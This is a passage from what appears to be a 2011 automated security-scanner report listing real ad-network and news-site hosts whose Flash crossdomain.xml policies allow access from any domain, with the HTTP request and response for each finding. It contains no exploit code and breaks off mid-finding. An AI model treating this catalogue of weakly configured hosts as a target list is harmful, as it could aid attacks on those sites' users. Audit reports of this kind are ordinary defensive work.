http://espn-media.unitedfuture.com.s3.amazonaws.com/crossdomain.xml
http://external.ak.fbcdn.net/crossdomain.xml
http://feed.video.news.com.au/crossdomain.xml
http://feeds.news.com.au/crossdomain.xml
http://g-pixel.invitemedia.com/crossdomain.xml
http://g.ca.bid.invitemedia.com/crossdomain.xml
http://hpi.rotator.hadj7.adjuggler.net/crossdomain.xml
http://i.w55c.net/crossdomain.xml
http://ib.adnxs.com/crossdomain.xml
http://img-cdn.mediaplex.com/crossdomain.xml
http://img.mediaplex.com/crossdomain.xml
http://js.revsci.net/crossdomain.xml
http://l.yimg.com/crossdomain.xml
http://m.xp1.ru4.com/crossdomain.xml
http://map.media6degrees.com/crossdomain.xml
http://ndm.feeds.theplatform.com/crossdomain.xml
http://pix04.revsci.net/crossdomain.xml
http://pixel.invitemedia.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://pt200194.unica.com/crossdomain.xml
http://s0.2mdn.net/crossdomain.xml
http://s1.2mdn.net/crossdomain.xml
http://secure-au.imrworldwide.com/crossdomain.xml
http://statse.webtrendslive.com/crossdomain.xml
http://sync.mathtag.com/crossdomain.xml
http://tags.bluekai.com/crossdomain.xml
http://www.7perth.com.au/crossdomain.xml
http://www.abc.net.au/crossdomain.xml
http://www.weatherchannel.com.au/crossdomain.xml
http://yql.yahooapis.com/crossdomain.xml
http://adadvisor.net/crossdomain.xml
http://ads.adbrite.com/crossdomain.xml
http://api.tweetmeme.com/crossdomain.xml
http://au.adserver.yahoo.com/crossdomain.xml
http://au.news.yahoo.com/crossdomain.xml
http://au.pfinance.yahoo.com/crossdomain.xml
http://cm.au.thewest.overture.com/crossdomain.xml
http://cookex.amp.yahoo.com/crossdomain.xml
http://courses.mycareer.com.au/crossdomain.xml
http://feeds.mycareer.com.au/crossdomain.xml
http://media.perthnow.com.au/crossdomain.xml
http://optimized-by.rubiconproject.com/crossdomain.xml
http://pagead2.googlesyndication.com/crossdomain.xml
http://pluck.abc.net.au/crossdomain.xml
http://resources.news.com.au/crossdomain.xml
http://static.ak.fbcdn.net/crossdomain.xml
http://traktr.news.com.au/crossdomain.xml
http://webservice.theweather.com.au/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.smh.com.au/crossdomain.xml
http://www.watoday.com.au/crossdomain.xml
http://www.wtp101.com/crossdomain.xml
http://api.twitter.com/crossdomain.xml
http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

3.1. http://ad.agkn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.agkn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"219-1313398290000"
Last-Modified: Mon, 15 Aug 2011 08:51:30 GMT
Content-Type: application/xml
Content-Length: 219
Date: Wed, 07 Sep 2011 14:15:20 GMT
Connection: close

<?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
    <allow-access-from domain="*" />
    </cr
...[SNIP]...

3.2. http://ad.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Wed, 07 Sep 2011 14:14:22 GMT
Content-Type: text/xml;charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:22 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.3. http://adfarm.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adfarm.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Wed, 07 Sep 2011 14:14:35 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.4. http://adsfac.us/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adsfac.us
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "0291dc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Wed, 07 Sep 2011 14:21:02 GMT
Connection: close
Content-Length: 125

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-domain-policy>

3.5. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Thu, 08 Sep 2011 14:14:17 GMT
Date: Wed, 07 Sep 2011 14:14:17 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.6. http://bh.contextweb.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729061000"
Last-Modified: Tue, 30 Aug 2011 18:31:01 GMT
Content-Type: application/xml
Content-Length: 269
Date: Wed, 07 Sep 2011 14:16:01 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.7. http://bid.rb.ntc.ace.advertising.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bid.rb.ntc.ace.advertising.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bid.rb.ntc.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 07 Sep 2011 14:14:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:31 GMT
Content-Type: text/xml
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.8. http://bs.serving-sys.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 07 Sep 2011 14:14:23 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

3.9. http://cdn.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Wed, 07 Sep 2011 14:14:22 GMT
Date: Wed, 07 Sep 2011 14:14:22 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.10. http://cdn4.eyewonder.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn4.eyewonder.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn4.eyewonder.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:17 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.11. http://content.yieldmanager.edgesuite.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.yieldmanager.edgesuite.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: content.yieldmanager.edgesuite.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "428510723c54e1303cd7c65e002e5c20:1140130382"
Last-Modified: Thu, 16 Feb 2006 22:53:38 GMT
Accept-Ranges: bytes
Content-Length: 201
Content-Type: application/xml
Cache-Control: max-age=31536000
Date: Wed, 07 Sep 2011 14:20:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.12. http://d3.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d3.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
Date: Wed, 07 Sep 2011 14:14:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.13. http://d7.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=5429
Date: Wed, 07 Sep 2011 14:14:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.14. http://e.yimg.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://e.yimg.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: e.yimg.com

Response

HTTP/1.0 200 OK
Date: Wed, 07 Sep 2011 00:48:28 GMT
Cache-Control: max-age=315360000
Expires: Sat, 04 Sep 2021 00:48:28 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 48503
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.15. http://edge.aperture.displaymarketplace.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://edge.aperture.displaymarketplace.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://edge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:1b06"
Server: Microsoft-IIS/6.0
X-Server: D2A.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Wed, 07 Sep 2011 14:15:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:15:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control perm
...[SNIP]...

3.16. http://espn-media.unitedfuture.com.s3.amazonaws.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://espn-media.unitedfuture.com.s3.amazonaws.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: espn-media.unitedfuture.com.s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: zK7zaHiDXGCEZEqEThCTFm0axSqne8S7+V5NYbmJOvT8AeNTo4VGn1zUoEnH+jgL
x-amz-request-id: 85E0D11E6B66A525
Date: Wed, 07 Sep 2011 14:15:12 GMT
x-amz-meta-cb-modifiedtime: Tue, 03 Aug 2010 22:06:08 GMT
Last-Modified: Wed, 18 Aug 2010 21:56:31 GMT
ETag: "ae0d9ae5889a0eb857d5ac66b0a439ae"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 185
Server: AmazonS3

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="master-only" />
</cross-domain-policy>

3.17. http://external.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:18:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.18. http://feed.video.news.com.au/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.video.news.com.au
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feed.video.news.com.au

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 325
Last-Modified: Thu, 04 Aug 2011 11:13:54 GMT
Server: Jetty(6.1.19)
Date: Wed, 07 Sep 2011 14:14:53 GMT
Connection: close

<?xml version="1.0"?>


<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.19. http://feeds.news.com.au/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feeds.news.com.au
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: feeds.news.com.au
Proxy-Connection: keep-alive
Referer: http://media.perthnow.com.au/ipad/300x250_GetMore_Swipe_RSS_Feed_PerthNow.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "ff684cff42d8e750dc963b501946080a:1214175420"
Last-Modified: Sun, 22 Jun 2008 22:57:00 GMT
Accept-Ranges: bytes
Content-Length: 275
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:54 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="ma
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.20. http://g-pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://g-pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.21. http://g.ca.bid.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://g.ca.bid.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: g.ca.bid.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:14 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.22. http://hpi.rotator.hadj7.adjuggler.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: hpi.rotator.hadj7.adjuggler.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"340-1315378660000"
Last-Modified: Wed, 07 Sep 2011 06:57:40 GMT
Content-Type: application/xml
Content-Length: 340
Date: Wed, 07 Sep 2011 14:14:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies=
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.23. http://i.w55c.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: i.w55c.net

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:17 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 488
content-type: application/xml
Via: 1.1 bfi061002 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" to-ports="*"/>
<site-control
...[SNIP]...

3.24. http://ib.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 08-Sep-2011 14:14:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Tue, 06-Sep-2016 14:14:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.25. http://img-cdn.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img-cdn.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Wed, 07 Sep 2011 14:14:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.26. http://img.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:19 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.27. http://js.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:28 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.28. http://l.yimg.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://l.yimg.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: l.yimg.com

Response

HTTP/1.0 200 OK
Date: Wed, 07 Sep 2011 01:13:30 GMT
Cache-Control: max-age=315360000
Expires: Sat, 04 Sep 2021 01:13:30 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 46926
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.29. http://m.xp1.ru4.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 07 Sep 2011 14:14:14 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.30. http://map.media6degrees.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://map.media6degrees.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Wed, 07 Sep 2011 14:14:29 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.31. http://ndm.feeds.theplatform.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ndm.feeds.theplatform.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ndm.feeds.theplatform.com

Response

HTTP/1.0 200 OK
ETag: W/"187-1206468920250"
Last-Modified: Tue, 25 Mar 2008 18:15:20 GMT
Content-Type: text/xml
Content-Length: 187
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Date: Wed, 07 Sep 2011 14:14:46 GMT
X-Cache: HIT from feeds.theplatform.com
Via: 1.0 sea1squid01 (squid/3.0.STABLE23)
Connection: close

<?xml version="1.0"?>


<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.32. http://pix04.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

3.33. http://pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.34. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
